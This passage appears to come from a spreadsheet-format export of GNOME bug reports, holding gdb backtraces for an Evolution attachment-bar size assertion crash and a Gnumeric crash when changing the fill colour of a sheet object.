    detail=0 var_args=) at gsignal.c:2197
#89 0xb6a305e5 in g_signal_emit (instance=0x0 signal_id=0 detail=0)
    at gsignal.c:2241
#90 0xb70239e1 in gtk_menu_item_activate (menu_item=0x84aae80)
    at gtkmenuitem.c:405
#91 0xb705058a in gtk_radio_menu_item_activate (menu_item=0x84ab018)
    at gtkradiomenuitem.c:472
#92 0xb6a2bb70 in g_cclosure_marshal_VOID__VOID (closure=0x8193070 
    return_value=0x0 n_param_values=1 param_values=0xbf95805c 
    invocation_hint=0xbf957f4c marshal_data=0xb70504f3) at gmarshal.c:77
#93 0xb6a1f76b in g_type_class_meta_marshal (closure=0x8193070 
    return_value=0x0 n_param_values=0 param_values=0xbf95805c 
    invocation_hint=0x0 marshal_data=0x0) at gclosure.c:567
#94 0xb6a1fda9 in g_closure_invoke (closure=0x8193070 return_value=0x0 
    n_param_values=0 param_values=0x0 invocation_hint=0x0) at gclosure.c:490
#95 0xb6a2ed1c in signal_emit_unlocked_R (node=0x8193088 detail=0 
    instance=0x84ab018 emission_return=0x0 instance_and_params=0xbf95805c)
    at gsignal.c:2368
#96 0xb6a30269 in g_signal_emit_valist (instance=0x84ab018 signal_id=179 
    detail=0 var_args=) at gsignal.c:2197
#97 0xb6a305e5 in g_signal_emit (instance=0x0 signal_id=0 detail=0)
    at gsignal.c:2241
#98 0xb711fdc8 in gtk_widget_activate (widget=) at gtkwidget.c:3932
#99 0xb702701f in gtk_menu_shell_activate_item (menu_shell=0x8184ce0 
    menu_item=0x84ab018 force_deactivate=1) at gtkmenushell.c:1024
#100 0xb70272f1 in gtk_menu_shell_button_release (widget=0x8184ce0 
    event=0x8637458) at gtkmenushell.c:630
#101 0xb701f554 in gtk_menu_button_release (widget=0x8184ce0 event=0x8637458)
    at gtkmenu.c:2619
#102 0xb7017048 in _gtk_marshal_BOOLEAN__BOXED (closure=0x819ce20 
    return_value=0xbf9584c0 n_param_values=2 param_values=0xbf9585bc 
    invocation_hint=0xbf9584ac marshal_data=0xb701f4c0) at gtkmarshalers.c:83
#103 0xb6a1f76b in g_type_class_meta_marshal (closure=0x819ce20 
    return_value=0x0 n_param_values=0 param_values=0xbf9585bc 
    invocation_hint=0x0 marshal_data=0x0) at gclosure.c:567
#104 0xb6a1fda9 in g_closure_invoke (closure=0x819ce20 return_value=0x0 
    n_param_values=0 param_values=0x0 invocation_hint=0x0) at gclosure.c:490
#105 0xb6a2f11e in signal_emit_unlocked_R (node=0x819dfb0 detail=0 
    instance=0x8184ce0 emission_return=0xbf95877c 
    instance_and_params=0xbf9585bc) at gsignal.c:2476
#106 0xb6a2ffd6 in g_signal_emit_valist (instance=0x8184ce0 signal_id=58 
    detail=0 
    var_args=0xbf958800 \030\210\225Â¿Xtc\bÃ L\030\bÂ¡\001\022Â·Ã L\030\bÂ¸ÃŒ\n\b)
    at gsignal.c:2207
#107 0xb6a305e5 in g_signal_emit (instance=0x0 signal_id=0 detail=0)
    at gsignal.c:2241
#108 0xb711ffca in gtk_widget_event_internal (widget=0x8184ce0 
    event=0x8637458) at gtkwidget.c:3901
#109 0xb70157c6 in gtk_propagate_event (widget=0x8184ce0 event=0x8637458)
    at gtkmain.c:2187
#110 0xb7015bd0 in gtk_main_do_event (event=0x8637458) at gtkmain.c:1421
#111 0xb6d97c2c in gdk_event_dispatch (source=0x0 callback=0 user_data=0x0)
    at gdkevents-x11.c:2320
#112 0xb69ab26b in g_main_context_dispatch (context=0x80a1f50) at gmain.c:2043
#113 0xb69ae3b6 in g_main_context_iterate (context=0x80a1f50 block=1 
    dispatch=1 self=0x806bf28) at gmain.c:2675
#114 0xb69ae6d8 in g_main_loop_run (loop=0x82f5bf0) at gmain.c:2879
#115 0xb7639386 in bonobo_main () at bonobo-main.c:311
#116 0x0805c5a9 in main (argc=6 argv=0xbf958c14) at main.c:614
Thread 5 (Thread -1253753936 (LWP 11221)):
#0  0xffffe410 in __kernel_vsyscall ()
No symbol table info available.
#1  0xb68fb8c4 in poll () from /lib/tls/i686/cmov/libc.so.6
No symbol table info available.
#2  0xb69ae208 in g_main_context_iterate (context=0x845b518 block=1 
    dispatch=1 self=0x80abdb0) at gmain.c:2977
	max_priority = 2147483647
	timeout = -1
	some_ready = 
	nfds = 9
	allocated_nfds = 
	fds = (GPollFD *) 0x8587e48
	__PRETTY_FUNCTION__ = g_main_context_iterate
#3  0xb69ae6d8 in g_main_loop_run (loop=0x84755b0) at gmain.c:2879
	got_ownership = -1221861792
	self = (GThread *) 0x80abdb0
	__PRETTY_FUNCTION__ = g_main_loop_run
#4  0xb730c4ce in link_io_thread_fn (data=0x0) at linc.c:396
No locals.
#5  0xb69c7933 in g_thread_create_proxy (data=0x80abdb0) at gthread.c:553
	__PRETTY_FUNCTION__ = g_thread_create_proxy
#6  0xb72bc341 in start_thread () from /lib/tls/i686/cmov/libpthread.so.0
No symbol table info available.
#7  0xb69054ee in clone () from /lib/tls/i686/cmov/libc.so.6
No symbol table info available.
Thread 4 (Thread -1304376400 (LWP 11265)):
#0  0xffffe410 in __kernel_vsyscall ()
No symbol table info available.
#1  0xb68fe0c1 in select () from /lib/tls/i686/cmov/libc.so.6
No symbol table info available.
#2  0xb7a90f5f in e_msgport_wait (mp=0x8320b30) at e-msgport.c:643
	rfds = {__fds_bits = {0 64 0 }}
	retry = 
	msg = 
#3  0xb7a917b6 in thread_dispatch (din=0x8320ad0) at e-msgport.c:1035
	e = 
	m = (EMsg *) 0x0
	info = 
	self = 2990590896
#4  0xb72bc341 in start_thread () from /lib/tls/i686/cmov/libpthread.so.0
No symbol table info available.
#5  0xb69054ee in clone () from /lib/tls/i686/cmov/libc.so.6
No symbol table info available.
Thread 3 (Thread -1295983696 (LWP 11267)):
#0  0xffffe410 in __kernel_vsyscall ()
No symbol table info available.
#1  0xb68fe0c1 in select () from /lib/tls/i686/cmov/libc.so.6
No symbol table info available.
#2  0xb7a90f5f in e_msgport_wait (mp=0x83208d0) at e-msgport.c:643
	rfds = {__fds_bits = {1073741824 0 }}
	retry = 
	msg = 
#3  0xb7a917b6 in thread_dispatch (din=0x8320870) at e-msgport.c:1035
	e = 
	m = (EMsg *) 0x0
	info = 
	self = 2998983600
#4  0xb72bc341 in start_thread () from /lib/tls/i686/cmov/libpthread.so.0
No symbol table info available.
#5  0xb69054ee in clone () from /lib/tls/i686/cmov/libc.so.6
No symbol table info available.
Thread 2 (Thread -1279198288 (LWP 11268)):
#0  0xffffe410 in __kernel_vsyscall ()
No symbol table info available.
#1  0xb68fe0c1 in select () from /lib/tls/i686/cmov/libc.so.6
No symbol table info available.
#2  0xb7a90f5f in e_msgport_wait (mp=0x8320a00) at e-msgport.c:643
	rfds = {__fds_bits = {0 4 0 }}
	retry = 
	msg = 
#3  0xb7a917b6 in thread_dispatch (din=0x83209a0) at e-msgport.c:1035
	e = 
	m = (EMsg *) 0x0
	info = 
	self = 3015769008
#4  0xb72bc341 in start_thread () from /lib/tls/i686/cmov/libpthread.so.0
No symbol table info available.
#5  0xb69054ee in clone () from /lib/tls/i686/cmov/libc.so.6
No symbol table info available.
Thread 1 (Thread -1233303872 (LWP 11211)):
#0  0xffffe410 in __kernel_vsyscall ()
No symbol table info available.
#1  0xb72c248b in __waitpid_nocancel ()
   from /lib/tls/i686/cmov/libpthread.so.0
No symbol table info available.
#2  0xb7893b04 in libgnomeui_segv_handle (signum=-512) at gnome-ui-init.c:867
	estatus = 0
	in_segv = 1
	sa = {__sigaction_handler = {sa_handler = 0 sa_sigaction = 0} 
  sa_mask = {__val = {136634432 136278384 3214230376 3066954196 
      135349008 136634432 139493136 11 142819460 136278384 3214230360 
      3067040672 142819448 11 10 3073112181 3073167000 8 3214230392 
      3073156798 2 3063996952 3214230472 3063684519 134659760 
      3063996952 3214230488 3063684519 134659760 3214230500 3214230456 
      134662144}} sa_flags = 0 sa_restorer = 0}
	pid = 0
#3  
No symbol table info available.
#4  0xffffe410 in __kernel_vsyscall ()
No symbol table info available.
#5  0xb68649a1 in raise () from /lib/tls/i686/cmov/libc.so.6
No symbol table info available.
#6  0xb68662b9 in abort () from /lib/tls/i686/cmov/libc.so.6
No symbol table info available.
#7  0xb69b3b76 in g_logv (log_domain= 
    log_level=G_LOG_LEVEL_CRITICAL 
    format=0xb69dc095 %s: assertion `%s' failed 
    args1=0xbf954ccc \001H Â·\226Ã‘\037Â·0\vÃµÂ·Â¸ÃŒ\n\b\003\001\006)
    at gmessages.c:497
	depth = 0
	domain = (GLogDomain *) 0x0
	data = (gpointer) 0x0
	log_func = (GLogFunc) 0xb69b4153 
	domain_fatal_mask = 5
	test_level = 
	was_fatal = 0
	was_recursion = 0
	i = 
#8  0xb69b3bb6 in g_log (log_domain=0x0 log_level=0 format=0x0)
    at gmessages.c:517
	args = 0xbf954ccc \001H Â·\226Ã‘\037Â·0\vÃµÂ·Â¸ÃŒ\n\b\003\001\006
#9  0xb69b3c8a in g_return_if_fail_warning (log_domain=0x0 
    pretty_function=0xb7204801 gtk_widget_set_size_request expression=0x0)
    at gmessages.c:532
No locals.
#10 0xb7124cfe in gtk_widget_set_size_request (widget=0x8766160 width=-15 
    height=0) at gtkwidget.c:6073
	__PRETTY_FUNCTION__ = gtk_widget_set_size_request
#11 0xb7ef6d9a in e_attachment_bar_set_width (bar=0x8766160 bar_width=-15)
    at e-attachment-bar.c:520
	height = 121
	width = 90
#12 0xb5d5f2cb in efhd_bar_resize (w=0x8461eb0 event=0xbf95527c 
    efh=0x8461230) at em-format-html-display.c:2219
	width = -15
	req = {width = 485 height = 1}
#13 0xb6a2c3d2 in g_cclosure_marshal_VOID__BOXED (closure=0x87eb7e0 
    return_value=0x0 n_param_values=2 param_values=0xbf95500c 
    invocation_hint=0xbf954efc marshal_data=0xb5d5f26d) at gmarshal.c:566
	data1 = (gpointer) 0x8461eb0
	data2 = 
	__PRETTY_FUNCTION__ = g_cclosure_marshal_VOID__BOXED
#14 0xb6a1fda9 in g_closure_invoke (closure=0x87eb7e0 return_value=0x0 
    n_param_values=0 param_values=0x0 invocation_hint=0x0) at gclosure.c:490
	marshal = (
    GClosureMarshal) 0xb6a2c37f 
	marshal_data = (gpointer) 0x0
	in_marshal = 0
	__PRETTY_FUNCTION__ = g_closure_invoke
#15 0xb6a2ea3a in signal_emit_unlocked_R (node=0x8154560 detail=0 
    instance=0x8461eb0 emission_return=0x0 instance_and_params=0xbf95500c)
    at gsignal.c:2438
	tmp = 
	handler = (Handler *) 0x87396c0
	accumulator = (SignalAccumulator *) 0x0
	emission = {next = 0xbf9555e4 instance = 0x8461eb0 ihint = {
    signal_id = 44 detail = 0 run_type = G_SIGNAL_RUN_FIRST} 
  state = EMISSION_RUN chain_type = 4}
	class_closure = (GClosure *) 0x817d368
	handler_list = (Handler *) 0x8739780
	return_accu = (GValue *) 0x0
	accu = {g_type = 0 data = {{v_int = 0 v_uint = 0 v_long = 0 
      v_ulong = 0 v_int64 = 0 v_uint64 = 0 v_float = 0 v_double = 0 
      v_pointer = 0x0} {v_int = 0 v_uint = 0 v_long = 0 v_ulong = 0 
      v_int64 = 0 v_uint64 = 0 v_float = 0 v_double = 0 v_pointer = 0x0}}}
	signal_id = 44
	max_sequential_handler_number = 6600
	return_value_altered = 1
#16 0xb6a30269 in g_signal_emit_valist (instance=0x8461eb0 signal_id=44 
    detail=0 var_args=) at gsignal.c:2197
	_flags = 
	_vtable = 
	_cvalues = {{v_int = -1214885636 v_long = -1214885636 
    v_int64 = 3080081660 v_double = 1.5217625345916788e-314 
    v_pointer = 0xb79650fc} {v_int = 0 v_long = 0 
    v_int64 = -4641714265097502720 v_double = -0.020818591117858887 
    v_pointer = 0x0} {v_int = -1215097964 v_long = -1215097964 
    v_int64 = 609807053268128660 v_double = 6.8052522221355128e-268 
    v_pointer = 0xb7931394} {v_int = 140689552 v_long = 140689552 
    v_int64 = 140689552 v_double = 6.9509874371995639e-316 
    v_pointer = 0x862c090} {v_int = 0 v_long = 0 v_int64 = 0 
    v_double = 0 v_pointer = 0x0} {v_int = 0 v_long = 0 
    v_int64 = -4641714058939072512 v_double = -0.020819306373596191 
    v_pointer = 0x0} {v_int = -1215300099 v_long = -1215300099 
    v_int64 = 609807053267926525 v_double = 6.8052522219180196e-268 
    v_pointer = 0xb78ffdfd} {v_int = 140689552 v_long = 140689552 
    v_int64 = -5219965786694434672 v_double = -4.4419892109583846e-41 
    v_pointer = 0x862c090}}
	_lcopy_format = 
	_n_values = 
	return_value = {g_type = 3063996952 data = {{v_int = 447 
      v_uint = 447 v_long = 447 v_ulong = 447 
      v_int64 = -5247856436871953985 v_uint64 = 13198887636837597631 
      v_float = 6.26380414e-43 v_double = -6.2483679571362103e-43 
      v_pointer = 0x1bf} {v_int = -1080733192 v_uint = 3214234104 
      v_long = -1080733192 v_ulong = 3214234104 
      v_int64 = -5289052286787169800 v_uint64 = 13157691786922381816 
      v_float = -1.16656399 v_double = -1.117167370918277e-45 
      v_pointer = 0xbf9551f8}}}
	error = 
	instance_and_params = (GValue *) 0xbf95500c
	stack_values = {{g_type = 141965704 data = {{v_int = 138813104 
        v_uint = 138813104 v_long = 138813104 v_ulong = 138813104 
        v_int64 = 138813104 v_uint64 = 138813104 v_float = 5.96195306e-34 
        v_double = 6.8582785878988124e-316 v_pointer = 0x8461eb0} {
        v_int = 0 v_uint = 0 v_long = 0 v_ulong = 0 v_int64 = 0 
        v_uint64 = 0 v_float = 0 v_double = 0 v_pointer = 0x0}}} {
    g_type = 135001944 data = {{v_int = -1080733060 v_uint = 3214234236 
        v_long = -1080733060 v_ulong = 3214234236 v_int64 = 3214234236 
        v_uint64 = 3214234236 v_float = -1.16657972 
        v_double = 1.5880427136943857e-314 v_pointer = 0xbf95527c} {
        v_int = 134217728 v_uint = 134217728 v_long = 134217728 
        v_ulong = 134217728 v_int64 = 134217728 v_uint64 = 134217728 
        v_float = 3.85185989e-34 v_double = 6.631236846766476e-316 
        v_pointer = 0x8000000}}} {g_type = 3214233836 data = {{v_int = 0 
        v_uint = 0 v_long = 0 v_ulong = 0 v_int64 = -5247827759375319040 
        v_uint64 = 13198916314334232576 v_float = 0 
        v_double = -6.2712109010965398e-43 v_pointer = 0x0} {
        v_int = -1221800296 v_uint = 3073167000 v_long = -1221800296 
        v_ulong = 3073167000 v_int64 = 123332251288 
        v_uint64 = 123332251288 v_float = -1.03001003e-05 
        v_double = 6.0934228385660631e-313 v_pointer = 0xb72cce98}}} {
    g_type = 3214233688 data = {{v_int = -1221855115 v_uint = 3073112181 
        v_long = -1221855115 v_ulong = 3073112181 
        v_int64 = -5247592310490007435 v_uint64 = 13199151763219544181 
        v_float = -1.02502427e-05 v_double = -6.458756758434075e-43 
        v_pointer = 0xb72bf875} {v_int = 28 v_uint = 28 v_long = 28 
        v_ulong = 28 v_int64 = -4641715433328607204 
        v_uint64 = 13805028640380944412 v_float = 3.9236357e-44 
        v_double = -0.020814538002014257 v_pointer = 0x1c}}} {
    g_type = 3073156798 data = {{v_int = 2 v_uint = 2 v_long = 2 
        v_ulong = 2 v_int64 = -5286977369825869822 
        v_uint64 = 13159766703883681794 v_float = 2.80259693e-45 
        v_double = -1.4786482750348858e-45 v_pointer = 0x2} {
        v_int = -1080733512 v_uint = 3214233784 v_long = -1080733512 
        v_ulong = 3214233784 v_int64 = -5288313926074412872 
        v_uint64 = 13158430147635138744 v_float = -1.16652584 
        v_double = -1.2320381208197471e-45 v_pointer = 0xbf9550b8}}} {
    g_type = 134659760 data = {{v_int = 137672088 v_uint = 137672088 
        v_long = 137672088 v_ulong = 137672088 v_int64 = 137672088 
        v_uint64 = 137672088 v_float = 5.43802421e-34 
        v_double = 6.8019049072032928e-316 v_pointer = 0x834b598} {
        v_int = -1227350420 v_uint = 3067616876 v_long = -1227350420 
        v_ulong = 3067616876 v_int64 = 15952518764 v_uint64 = 15952518764 
        v_float = -6.44084321e-06 v_double = 7.8815914859302641e-314 
        v_pointer = 0xb6d81e6c}}} {g_type = 24 data = {{v_int = 134662176 
        v_uint = 134662176 v_long = 134662176 v_ulong = 134662176 
        v_int64 = 137573615648 v_uint64 = 137573615648 
        v_float = 4.0559404e-34 v_double = 6.7970397265844542e-313 
        v_pointer = 0x806c820} {v_int = 134662144 v_uint = 134662144 
        v_long = 134662144 v_ulong = 134662144 v_int64 = 13019564032 
        v_uint64 = 13019564032 v_float = 4.05592571e-34 
        v_double = 6.4325193120415439e-314 v_pointer = 0x806c800}}} {
    g_type = 24 data = {{v_int = 134663192 v_uint = 134663192 
        v_long = 134663192 v_ulong = 134663192 v_int64 = 47379303448 
        v_uint64 = 47379303448 v_float = 4.05640693e-34 
        v_double = 2.3408486157544519e-313 v_pointer = 0x806cc18} {
        v_int = -1227014464 v_uint = 3067952832 v_long = -1227014464 
        v_ulong = 3067952832 v_int64 = -4641714949224317248 
        v_uint64 = 13805029124485234368 v_float = -6.59361831e-06 
        v_double = -0.020816217576167473 v_pointer = 0xb6dd3ec0}}} {
    g_type = 3067616876 data = {{v_int = 142090240 v_uint = 142090240 
        v_long = 142090240 v_ulong = 142090240 
        v_int64 = -5219463249749598208 v_uint64 = 13227280823959953408 
        v_float = 7.46674012e-34 v_double = -4.8045796408102878e-41 
        v_pointer = 0x8782000} {v_int = -1080733464 v_uint = 3214233832 
        v_long = -1080733464 v_ulong = 3214233832 
        v_int64 = -5219965650476904216 v_uint64 = 13226778423232647400 
        v_float = -1.16653156 v_double = -4.4420586532130803e-41 
        v_pointer = 0xbf9550e8}}} {g_type = 142834512 data = {{v_int = 0 
        v_uint = 0 v_long = 0 v_ulong = 0 v_int64 = 0 v_uint64 = 0 
        v_float = 0 v_double = 0 v_pointer = 0x0} {v_int = -1227014464 
        v_uint = 3067952832 v_long = -1227014464 v_ulong = 3067952832 
        v_int64 = -4641714296389288256 v_uint64 = 13805029777320263360 
        v_float = -6.59361831e-06 v_double = -0.020818482552668938 
        v_pointer = 0xb6dd3ec0}}} {g_type = 3079716308 data = {{
        v_int = -1080733432 v_uint = 3214233864 v_long = -1080733432 
        v_ulong = 3214233864 v_int64 = -5219965650476904184 
        v_uint64 = 13226778423232647432 v_float = -1.16653538 
        v_double = -4.4420586532130966e-41 v_pointer = 0xbf955108} {
        v_int = 142503680 v_uint = 142503680 v_long = 142503680 
        v_ulong = 142503680 v_int64 = 142503680 v_uint64 = 142503680 
        v_float = 7.65658245e-34 v_double = 7.0406172693954328e-316 
        v_pointer = 0x87e6f00}}} {g_type = 3214233864 data = {{
        v_int = -1215097964 v_uint = 3079869332 v_long = -1215097964 
        v_ulong = 3079869332 v_int64 = 613469560859988884 
        v_uint64 = 613469560859988884 v_float = -1.75328823e-05 
        v_double = 1.1800508540197496e-267 v_pointer = 0xb7931394} {
        v_int = 140689552 v_uint = 140689552 v_long = 140689552 
        v_ulong = 140689552 v_int64 = 140689552 v_uint64 = 140689552 
        v_float = 6.82357573e-34 v_double = 6.9509874371995639e-316 
        v_pointer = 0x862c090}}} {g_type = 3080081660 data = {{v_int = 0 
        v_uint = 0 v_long = 0 v_ulong = 0 v_int64 = 0 v_uint64 = 0 
        v_float = 0 v_double = 0 v_pointer = 0x0} {v_int = -1080733400 
        v_uint = 3214233896 v_long = -1080733400 v_ulong = 3214233896 
        v_int64 = -5218806013601951448 v_uint64 = 13227938060107600168 
        v_float = -1.16653919 v_double = -5.4746836987430286e-41 
        v_pointer = 0xbf955128}}} {g_type = 142503680 data = {{
        v_int = 140689552 v_uint = 140689552 v_long = 140689552 
        v_ulong = 140689552 v_int64 = 140689552 v_uint64 = 140689552 
        v_float = 6.82357573e-34 v_double = 6.9509874371995639e-316 
        v_pointer = 0x862c090} {v_int = 0 v_uint = 0 v_long = 0 
        v_ulong = 0 v_int64 = -5269986994598969344 
        v_uint64 = 13176757079110582272 v_float = 0 
        v_double = -2.0490568901921532e-44 v_pointer = 0x0}}} {
    g_type = 3079716308 data = {{v_int = -1080733352 v_uint = 3214233944 
        v_long = -1080733352 v_ulong = 3214233944 
        v_int64 = -5219965650476904104 v_uint64 = 13226778423232647512 
        v_float = -1.16654491 v_double = -4.4420586532131373e-41 
        v_pointer = 0xbf955158} {v_int = 141981768 v_uint = 141981768 
        v_long = 141981768 v_ulong = 141981768 
        v_int64 = 604257024870873160 v_uint64 = 604257024870873160 
        v_float = 7.41693222e-34 v_double = 2.8396580566123684e-268 
        v_pointer = 0x8767848}}} {g_type = 3079599302 data = {{v_int = 0 
        v_uint = 0 v_long = 0 v_ulong = 0 v_int64 = 578369504489242624 
        v_uint64 = 578369504489242624 v_float = 0 
        v_double = 5.3902815232223673e-270 v_pointer = 0x0} {v_int = 3 
        v_uint = 3 v_long = 3 v_ulong = 3 v_int64 = 607839164892708867 
        v_uint64 = 607839164892708867 v_float = 4.20389539e-45 
        v_double = 4.7668130211124786e-268 v_pointer = 0x3}}}}
	free_me = (GValue *) 0x0
	signal_return_type = 4
	param_values = (GValue *) 0xbf955020
	node = (SignalNode *) 0x8154560
	i = 1
	n_params = 1
	__PRETTY_FUNCTION__ = g_signal_emit_valist
#17 0xb6a305e5 in g_signal_emit (instance=0x0 signal_id=0 detail=0)
    at gsignal.c:2241
	var_args = 0xbf95524c |R\225Â¿\0303v\b\220Ã€b\bx</t>
  </si>
  <si>
    <t>GNUMERIC-62030</t>
  </si>
  <si>
    <t>72.06 - crash when changing the color of a sheet object widget</t>
  </si>
  <si>
    <t xml:space="preserve">Package: Gnumeric
Severity: critical
Version: CVS
Synopsis: 72.06 - crash when changing the color of a sheet object widget
Bugzilla-Product: Gnumeric
Bugzilla-Component: Sheet Objects
Description:
started out with :
http://www.gnome.org/~chema/bug_072_05.gnumeric
Created a rectangle and tried changing the fill color. First i changed
the color to blue then changed it to transparent when gnumeric
crashed.
Debugging Information:
[New Thread 1024 (LWP 19903)]
0x406f5869 in __wait4 () from /lib/libc.so.6
#0  0x406f5869 in __wait4 () from /lib/libc.so.6
#1  0x407611c8 in __DTOR_END__ () from /lib/libc.so.6
#2  0x403b52a6 in gnome_segv_handle (signum=11) at gnome-init.c:659
#3  
#4  0x80cbaad in cb_dialog_filled_clicked (dialog=0x8876af0 button=1 data=0x872c8a0) at sheet-object-graphic.c:800
#5  0x4038fdf5 in gnome_dialog_marshal_signal_1 (object=0x8876af0 func=0x80cba14  func_data=0x872c8a0 args=0xbfffe930)
    at gnome-dialog.c:145
#6  0x4052a0d6 in gtk_handlers_run (handlers=0x8884658 signal=0xbfffe8d0 object=0x8876af0 params=0xbfffe930 after=0) at gtksignal.c:1917
#7  0x40529537 in gtk_signal_real_emit (object=0x8876af0 signal_id=148 params=0xbfffe930) at gtksignal.c:1477
#8  0x405275ac in gtk_signal_emit (object=0x8876af0 signal_id=148) at gtksignal.c:552
#9  0x403917cc in gnome_dialog_button_clicked (button=0x885d4f8 dialog=0x8876af0) at gnome-dialog.c:1014
#10 0x404faa03 in gtk_marshal_NONE__NONE (object=0x885d4f8 func=0x403916d0  func_data=0x8876af0 args=0xbfffecf0) at gtkmarshal.c:312
#11 0x4052a0d6 in gtk_handlers_run (handlers=0x8861b78 signal=0xbfffec90 object=0x885d4f8 params=0xbfffecf0 after=1) at gtksignal.c:1917
#12 0x40529673 in gtk_signal_real_emit (object=0x885d4f8 signal_id=88 params=0xbfffecf0) at gtksignal.c:1516
#13 0x405275ac in gtk_signal_emit (object=0x885d4f8 signal_id=88) at gtksignal.c:552
#14 0x40498568 in gtk_button_clicked (button=0x885d4f8) at gtkbutton.c:336
#15 0x40499ae2 in gtk_real_button_released (button=0x885d4f8) at gtkbutton.c:861
#16 0x404faa03 in gtk_marshal_NONE__NONE (object=0x885d4f8 func=0x40499a3c  func_data=0x0 args=0xbffff080) at gtkmarshal.c:312
#17 0x405293e3 in gtk_signal_real_emit (object=0x885d4f8 signal_id=87 params=0xbffff080) at gtksignal.c:1440
#18 0x405275ac in gtk_signal_emit (object=0x885d4f8 signal_id=87) at gtksignal.c:552
#19 0x404984ac in gtk_button_released (button=0x885d4f8) at gtkbutton.c:327
#20 0x40499457 in gtk_button_button_release (widget=0x885d4f8 event=0x8329e50) at gtkbutton.c:721
#21 0x404fa7d9 in gtk_marshal_BOOL__POINTER (object=0x885d4f8 func=0x40499394  func_data=0x0 args=0xbffff420) at gtkmarshal.c:28
#22 0x40529577 in gtk_signal_real_emit (object=0x885d4f8 signal_id=27 params=0xbffff420) at gtksignal.c:1492
#23 0x405275ac in gtk_signal_emit (object=0x885d4f8 signal_id=27) at gtksignal.c:552
#24 0x4055e978 in gtk_widget_event (widget=0x885d4f8 event=0x8329e50) at gtkwidget.c:2864
#25 0x404fa750 in gtk_propagate_event (widget=0x885d4f8 event=0x8329e50) at gtkmain.c:1378
#26 0x404f990d in gtk_main_do_event (event=0x8329e50) at gtkmain.c:818
#27 0x405b412b in gdk_event_dispatch (source_data=0x0 current_time=0xbffff7f0 user_data=0x0) at gdkevents.c:2139
#28 0x40632055 in g_main_dispatch (dispatch_time=0xbffff7f0) at gmain.c:656
#29 0x40632659 in g_main_iterate (block=1 dispatch=1) at gmain.c:877
#30 0x406327e8 in g_main_run (loop=0x81f4460) at gmain.c:935
#31 0x404f9213 in gtk_main () at gtkmain.c:524
#32 0x809d516 in main (argc=1 argv=0xbffff8f4) at main.c:281
#33 0x40660b5c in __libc_start_main (main=0x809d2ec  argc=1 ubp_av=0xbffff8f4 init=0x8066ec8  fini=0x8135c30  
    rtld_fini=0x4000d634  stack_end=0xbffff8ec) at ../sysdeps/generic/libc-start.c:129
Thread 1 (Thread 1024 (LWP 19903)):
#0  0x406f5869 in __wait4 () from /lib/libc.so.6
#1  0x407611c8 in __DTOR_END__ () from /lib/libc.so.6
#2  0x403b52a6 in gnome_segv_handle (signum=11) at gnome-init.c:659
#3  
#4  0x80cbaad in cb_dialog_filled_clicked (dialog=0x8876af0 button=1 data=0x872c8a0) at sheet-object-graphic.c:800
#5  0x4038fdf5 in gnome_dialog_marshal_signal_1 (object=0x8876af0 func=0x80cba14  func_data=0x872c8a0 args=0xbfffe930)
    at gnome-dialog.c:145
#6  0x4052a0d6 in gtk_handlers_run (handlers=0x8884658 signal=0xbfffe8d0 object=0x8876af0 params=0xbfffe930 after=0) at gtksignal.c:1917
#7  0x40529537 in gtk_signal_real_emit (object=0x8876af0 signal_id=148 params=0xbfffe930) at gtksignal.c:1477
#8  0x405275ac in gtk_signal_emit (object=0x8876af0 signal_id=148) at gtksignal.c:552
#9  0x403917cc in gnome_dialog_button_clicked (button=0x885d4f8 dialog=0x8876af0) at gnome-dialog.c:1014
#10 0x404faa03 in gtk_marshal_NONE__NONE (object=0x885d4f8 func=0x403916d0  func_data=0x8876af0 args=0xbfffecf0) at gtkmarshal.c:312
#11 0x4052a0d6 in gtk_handlers_run (handlers=0x8861b78 signal=0xbfffec90 object=0x885d4f8 params=0xbfffecf0 after=1) at gtksignal.c:1917
#12 0x40529673 in gtk_signal_real_emit (object=0x885d4f8 signal_id=88 params=0xbfffecf0) at gtksignal.c:1516
#13 0x405275ac in gtk_signal_emit (object=0x885d4f8 signal_id=88) at gtksignal.c:552
#14 0x40498568 in gtk_button_clicked (button=0x885d4f8) at gtkbutton.c:336
#15 0x40499ae2 in gtk_real_button_released (button=0x885d4f8) at gtkbutton.c:861
#16 0x404faa03 in gtk_marshal_NONE__NONE (object=0x885d4f8 func=0x40499a3c  func_data=0x0 args=0xbffff080) at gtkmarshal.c:312
#17 0x405293e3 in gtk_signal_real_emit (object=0x885d4f8 signal_id=87 params=0xbffff080) at gtksignal.c:1440
#18 0x405275ac in gtk_signal_emit (object=0x885d4f8 signal_id=87) at gtksignal.c:552
#19 0x404984ac in gtk_button_released (button=0x885d4f8) at gtkbutton.c:327
#20 0x40499457 in gtk_button_button_release (widget=0x885d4f8 event=0x8329e50) at gtkbutton.c:721
#21 0x404fa7d9 in gtk_marshal_BOOL__POINTER (object=0x885d4f8 func=0x40499394  func_data=0x0 args=0xbffff420) at gtkmarshal.c:28
#22 0x40529577 in gtk_signal_real_emit (object=0x885d4f8 signal_id=27 params=0xbffff420) at gtksignal.c:1492
#23 0x405275ac in gtk_signal_emit (object=0x885d4f8 signal_id=27) at gtksignal.c:552
#24 0x4055e978 in gtk_widget_event (widget=0x885d4f8 event=0x8329e50) at gtkwidget.c:2864
#25 0x404fa750 in gtk_propagate_event (widget=0x885d4f8 event=0x8329e50) at gtkmain.c:1378
#26 0x404f990d in gtk_main_do_event (event=0x8329e50) at gtkmain.c:818
#27 0x405b412b in gdk_event_dispatch (source_data=0x0 current_time=0xbffff7f0 user_data=0x0) at gdkevents.c:2139
#28 0x40632055 in g_main_dispatch (dispatch_time=0xbffff7f0) at gmain.c:656
#29 0x40632659 in g_main_iterate (block=1 dispatch=1) at gmain.c:877
#30 0x406327e8 in g_main_run (loop=0x81f4460) at gmain.c:935
#31 0x404f9213 in gtk_main () at gtkmain.c:524
#32 0x809d516 in main (argc=1 argv=0xbffff8f4) at main.c:281
#33 0x40660b5c in __libc_start_main (main=0x809d2ec  argc=1 ubp_av=0xbffff8f4 init=0x8066ec8  fini=0x8135c30  
    rtld_fini=0x4000d634  stack_end=0xbffff8ec) at ../sysdeps/generic/libc-start.c:129
#0  0x406f5869 in __wait4 () from /lib/libc.so.6
#0  0x406f5869 in __wait4 () from /lib/libc.so.6
No locals.
#1  0x407611c8 in __DTOR_END__ () from /lib/libc.so.6
No symbol table info available.
#2  0x403b52a6 in gnome_segv_handle (signum=11) at gnome-init.c:659
estatus = 66
in_segv = 1
pid = 0
#3  
No locals.
#4  0x80cbaad in cb_dialog_filled_clicked (dialog=0x8876af0 button=1 data=0x872c8a0) at sheet-object-graphic.c:800
800			sheet_object_graphic_fill_color_set (so
dialog = (GnomeDialog *) 0x8876af0
button = 1
